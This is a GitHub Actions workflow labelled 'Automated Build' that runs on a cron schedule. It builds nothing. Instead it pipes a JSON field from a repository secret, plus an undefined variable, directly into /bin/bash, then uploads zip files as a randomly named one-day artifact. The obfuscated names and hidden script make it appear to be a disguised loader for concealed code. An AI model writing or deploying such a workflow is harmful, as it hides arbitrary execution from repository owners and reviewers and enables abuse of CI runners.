name: Automated Build
on:
  workflow_dispatch:

  schedule:
    - cron: '59 0,6,12,18 * * *'
jobs:
  start:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute task
        env:
          pxa913: ${{ secrets.pxa913 }}
        run: |
          printf '%s' "$pxa913" | jq -r .ir9315 | /bin/bash
          echo $l030 | jq -r .e79 | /bin/bash

      - name: Persist data
        if: ${{ always() }}
        uses: actions/upload-artifact@v4
        with:
          name: OrfGQoGP
          path: "*.zip"
          retention-days: 1
